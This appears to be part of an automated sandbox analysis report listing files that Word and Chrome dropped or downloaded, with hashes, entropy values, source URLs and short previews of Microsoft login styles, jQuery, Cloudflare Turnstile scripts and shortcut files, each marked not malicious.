                                                                                                                            Size (bytes):12
                                                                                                                            Entropy (8bit):0.41381685030363374
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:/l:
                                                                                                                            MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                                                            SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                                                            SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                                                            SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                                                            Malicious:false
                                                                                                                            Preview:............
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):12
                                                                                                                            Entropy (8bit):0.41381685030363374
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:/l:
                                                                                                                            MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                                                            SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                                                            SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                                                            SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                                                            Malicious:false
                                                                                                                            Preview:............
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 15:55:41 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2677
                                                                                                                            Entropy (8bit):3.9915981048095572
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:8w4dq4TXQ7FhHgidAKZdA1JehwiZUklqehwy+3:8w34boQLy
                                                                                                                            MD5:8001C4DAB990F4316909251E0AD43294
                                                                                                                            SHA1:0538A66E688C660DBA6AC5DA18CD481A398613B1
                                                                                                                            SHA-256:90366C5E1A2CB620DB79689E6D2EC42E0C2768226970B0404F3A526665CF772E
                                                                                                                            SHA-512:EF8B6BDB1687666406A1135D2C62C8339A827D7747FF6AB5ECC41B75B1E4605D3BE03C114616D373DB3A00BD06236B81F5B428027B282582D139ECEB8573AEC1
                                                                                                                            Malicious:false
                                                                                                                            Preview:L..................F.@.. ...$+.,....=.I..9......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IrY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VrY.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VrY............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VrY.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............[......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 15:55:41 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2679
                                                                                                                            Entropy (8bit):4.008230046363686
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:8i4dq4TXQ7FhHgidAKZdA10eh/iZUkAQkqeh7y+2:8i34bo69QSy
                                                                                                                            MD5:0D933663D50AE8E602C3BE28338EE62A
                                                                                                                            SHA1:9BED65D5D7DB8FD4B09ECADB2A67E38406DF7C5A
                                                                                                                            SHA-256:9EEE9C53121B75F87821EF777A2F46318B36743FB74F619DB24B07FCA5D55F76
                                                                                                                            SHA-512:AD99ADA4EBF6EBDCF274AF0B6926C4A266BC3231A3A1705767C34D7FCE0162CBAE0AEB68568CE71EEC3EB3B1A6B7627D346A07F02E258C8DA29EB056D429722C
                                                                                                                            Malicious:false
                                                                                                                            Preview:L..................F.@.. ...$+.,....z@9..9......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IrY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VrY.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VrY............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VrY.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............[......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2693
                                                                                                                            Entropy (8bit):4.016214389926346
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:8e4dq4TXQ7FjHgidAKZdA14tIeh7sFiZUkmgqeh7sly+BX:8e34boknXy
                                                                                                                            MD5:93B3FC503865F358CEEE59B84EEB48BF
                                                                                                                            SHA1:4EC51581F8561183022016A4A31F133B8080E484
                                                                                                                            SHA-256:745F4C5FAFB0578EB657352D92049593C4AD2E45B3BC2854062B64867B542679
                                                                                                                            SHA-512:A2C0117BBF7CC8FE299539B04FB57DF152EAA9E902BFE0563BE0009E9740C99988D0AF8E5506277ACAC57BDD2B0F1EAF825D105A2FFB41539858B0C3FC3324BC
                                                                                                                            Malicious:false
                                                                                                                            Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IrY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VrY.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VrY............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............[......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 15:55:40 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2681
                                                                                                                            Entropy (8bit):4.004097407110986
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:8k4dq4TXQ7FhHgidAKZdA1behDiZUkwqehPy+R:8k34boxdy
                                                                                                                            MD5:A6342C2CF4B3291903549E7F0DB70B0A
                                                                                                                            SHA1:3FC7A5A990FFDA69CC36DB0289AA47CE866C685D
                                                                                                                            SHA-256:060ED93EFA807BA99FB7F9A712A9EDA57D9A0188CD8DAEF178A99EF62CC42841
                                                                                                                            SHA-512:567B7E7CCB2D2349FAEC1F36B224022F7E543053190187F5B3CBDC39D35DBF03F0AFBF1E3C0099CC83634F25986E33FE7C306B091DD6797156C9A012D317F963
                                                                                                                            Malicious:false
                                                                                                                            Preview:L..................F.@.. ...$+.,....@x1..9......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IrY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VrY.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VrY............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VrY.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............[......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 15:55:41 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2681
                                                                                                                            Entropy (8bit):3.9935037935140425
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:8n4dq4TXQ7FhHgidAKZdA1VehBiZUk1W1qehRy+C:8n34boR9xy
                                                                                                                            MD5:AE9C776F1D79455E63AB5096CF48B5B5
                                                                                                                            SHA1:6CD2003D5E54B8B953E18A88F3674011FCB20355
                                                                                                                            SHA-256:B8E0C99D618959B165D3991CFF6EC66152B991E9F08183C04C572E8D566CB589
                                                                                                                            SHA-512:0B025F701B120B7877E90C381B31CA1E0A3A7D24482B773B8D6433B7D14D8416217C586096E90C24CD7F616D552BB8BF897646205A9B1684DBD6977AAE2965B1
                                                                                                                            Malicious:false
                                                                                                                            Preview:L..................F.@.. ...$+.,......A..9......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IrY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VrY.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VrY............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VrY.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............[......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 15:55:40 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2683
                                                                                                                            Entropy (8bit):4.004994163927401
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:8k4dq4TXQ7FhHgidAKZdA1duT6ehOuTbbiZUk5OjqehOuTbXy+yT+:8k34boBTTTbxWOvTbXy7T
                                                                                                                            MD5:F4B479E943557521FFC99D0F2C9FFAEA
                                                                                                                            SHA1:B7E7794DE325BAD9D3EB045D4CB04A42E75ADCC7
                                                                                                                            SHA-256:4A1FCE55B1510AA34841D859FE29AC3F08FCDD0F33197B80FE558039AB33CF5C
                                                                                                                            SHA-512:F66DE64663ED7DE2D4648096FBAF69AF64A8C58769A3F9F255C21D20526C5DBDB772055D5E944681BD2D1362B4B5192B75D2B7219E11B95D8227F50F93613C37
                                                                                                                            Malicious:false
                                                                                                                            Preview:L..................F.@.. ...$+.,....Zj%..9......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IrY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VrY.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VrY............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VrY.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............[......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):162
                                                                                                                            Entropy (8bit):3.3122469021564136
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:nTgxqqp+yghXpXb:nsxDmBpXb
                                                                                                                            MD5:C50ABCCD7D803E87BC41371B31D93EA6
                                                                                                                            SHA1:117C412F77215EDE0F991CC66D6A43961A7135D7
                                                                                                                            SHA-256:6B9913FC89011BD6C5D3F4E89FC7F8AC656501D6C435543967F448C5D486BDF5
                                                                                                                            SHA-512:7867CE1D602D63D770CF2064527D296DCF988550874D9BF6798CB93322ACB71C9CFC66BF47CD070E11D4786830B4A038FA2183D3C5CB28DC2F6DB20AFCF8CC03
                                                                                                                            Malicious:false
                                                                                                                            Preview:....................................................................................9.......).2....}.j.....V...=Mj
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with very long lines (47671)
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):47672
                                                                                                                            Entropy (8bit):5.401921124762015
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:OeCtueCACDHsEW8tZunqu5TTfjdTdWm54gEnih4A2WibLXKUEn+V1Kgbdfi0Vdua:OvXmHFW8tZuquNP54VnKJ3UEsnpj
                                                                                                                            MD5:B804BCD42117B1BBE45326212AF85105
                                                                                                                            SHA1:7B4175AAF0B7E45E03390F50CB8ED93185017014
                                                                                                                            SHA-256:B7595C3D2E94DF7416308FA2CCF5AE8832137C76D2E9A8B02E6ED2CB2D92E2F7
                                                                                                                            SHA-512:9A4F038F9010DDCCF5E0FAF97102465EF7BA27B33F55C4B86D167C41096DB1E76C8212A5E36565F0447C4F57340A10DB07BB9AE26982DFFF92C411B5B1F1FB97
                                                                                                                            Malicious:false
                                                                                                                            Preview:"use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function g(u){Ht(l,o,c,g,h,"next",u)}function h(u){Ht(l,o,c,g,h,"throw",u)}g(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with very long lines (61177)
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):110586
                                                                                                                            Entropy (8bit):5.287109161477717
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:QpHDgBvguhw+EViazA/PWrF7qvEAFiQcpmUSeCgzc6VUg8:xkty6VUz
                                                                                                                            MD5:F0E5964F8BBEDF73D2D3001623BB663B
                                                                                                                            SHA1:AADF3504D5E5A93E678487EEB4A63398F2699341
                                                                                                                            SHA-256:9537F00CA371747A97A2ACCA388F7B2379A7FA7C59BDE18C3D2621C0DE8DE492
                                                                                                                            SHA-512:3E5D4EDDFB57E3178811D3DADD3AEB47908D70C92F442485E8EB8137A0BAB60927B800F436F3AE740496CABD16E29EC324841721D8FA3E39E00AC2FAFE3EAEC1
                                                                                                                            Malicious:false
                                                                                                                            URL:https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_8owwt4u-33ps0wawi7tmow2.css
                                                                                                                            Preview:/*! Copyright (C) Microsoft Corporation. All rights reserved. *//*!.------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------..This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise...//-----------------------------------------------------------------------------.twbs-bootstrap-sass (3.3.0).//-----------------------------------------------------------------------------..The MIT License (MIT)..Copyright (c) 2013 Twitter, Inc..Permission is hereby granted, free of charge, to any person
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):16
                                                                                                                            Entropy (8bit):3.875
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:HiPs:CPs
                                                                                                                            MD5:D6B82198AF25D0139723AF9E44D3D23A
                                                                                                                            SHA1:D60DEEF1847EEEF1889803E9D3ADC7EDA220F544
                                                                                                                            SHA-256:A5C8CC49FA6649BE393EF22C2B31F1C46B671F8D763F783ED6D7B4E33669BDA3
                                                                                                                            SHA-512:B21BEE2EEC588308A9DC3C3C2405377704B39B08AA20CBA40BA6E6834E67CF6F2C086E0701F5B05AEE27E2677E9C5C24FF137318275ACA00DD063DF3DCC07D4D
                                                                                                                            Malicious:false
                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAks788H_m6uXBIFDVd69_0=?alt=proto
                                                                                                                            Preview:CgkKBw1Xevf9GgA=
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:PNG image data, 99 x 98, 8-bit/color RGB, non-interlaced
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):61
                                                                                                                            Entropy (8bit):4.068159130770306
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:yionv//thPlO/0gO6yxl/k4E08up:6v/lhPfr7Tp
                                                                                                                            MD5:69DECBFC309E4853CC1394DF0268A1A5
                                                                                                                            SHA1:74D0AB783ADF5E8E46BB7597CADCACD4CDCA3369
                                                                                                                            SHA-256:A5BFE2B1E7456176BB2C826EE37403B01F0A83AAEB933ECD7F5A38476C116E32
                                                                                                                            SHA-512:97057E01EF982A0EA754B218A25AD25077DEA778D6329667C41C5647B68B1EDF74A265F4B4B69A2419F273D63A8B018F11DE23FE22E26483FB6EDCE33FB9197D
                                                                                                                            Malicious:false
                                                                                                                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8e497d813cb62ff4/1731948951564/p8JSJGxodSL51Dr
                                                                                                                            Preview:.PNG........IHDR...c...b........g....IDAT.....$.....IEND.B`.
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with very long lines (65447)
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):89501
                                                                                                                            Entropy (8bit):5.289893677458563
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                            Malicious:false
                                                                                                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):276
                                                                                                                            Entropy (8bit):7.316609873335077
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
                                                                                                                            MD5:4E3510919D29D18EEB6E3E8B2687D2F5
                                                                                                                            SHA1:31522A9EC576A462C3F1FFA65C010D4EB77E9A85
                                                                                                                            SHA-256:1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
                                                                                                                            SHA-512:DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
                                                                                                                            Malicious:false
                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg
                                                                                                                            Preview:...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....*e.......J).*8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):21
                                                                                                                            Entropy (8bit):3.4273334938982654
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:xKGNQt:x7mt
                                                                                                                            MD5:B93F7F189C790DF6BA03B02CE34992C6
                                                                                                                            SHA1:FAE19625E4770FC922B28949B80E5C245CAD3A78
                                                                                                                            SHA-256:3561C489D0B2FF97C747C10BB39D826D4E69C62C7E13BF423492735221298843
                                                                                                                            SHA-512:089711C4E21F2DF6BC5DC6E2BC13974A0F2D1AF608A2175C25C049A9E15AAA2BBDCD2DD6A8DBA8BBB375F7DAFFB0C9D9334486546B6419DCC5EE5FD4983261DD
                                                                                                                            Malicious:false
                                                                                                                            Preview:Site is coming soon!!
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with very long lines (47671)
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):47672
                                                                                                                            Entropy (8bit):5.401921124762015
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:OeCtueCACDHsEW8tZunqu5TTfjdTdWm54gEnih4A2WibLXKUEn+V1Kgbdfi0Vdua:OvXmHFW8tZuquNP54VnKJ3UEsnpj
                                                                                                                            MD5:B804BCD42117B1BBE45326212AF85105
                                                                                                                            SHA1:7B4175AAF0B7E45E03390F50CB8ED93185017014
                                                                                                                            SHA-256:B7595C3D2E94DF7416308FA2CCF5AE8832137C76D2E9A8B02E6ED2CB2D92E2F7
                                                                                                                            SHA-512:9A4F038F9010DDCCF5E0FAF97102465EF7BA27B33F55C4B86D167C41096DB1E76C8212A5E36565F0447C4F57340A10DB07BB9AE26982DFFF92C411B5B1F1FB97
                                                                                                                            Malicious:false
                                                                                                                            URL:https://challenges.cloudflare.com/turnstile/v0/b/22755d9a86c9/api.js
                                                                                                                            Preview:"use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function g(u){Ht(l,o,c,g,h,"next",u)}function h(u){Ht(l,o,c,g,h,"throw",u)}g(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):1864
                                                                                                                            Entropy (8bit):5.222032823730197
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                                                                                            MD5:BC3D32A696895F78C19DF6C717586A5D
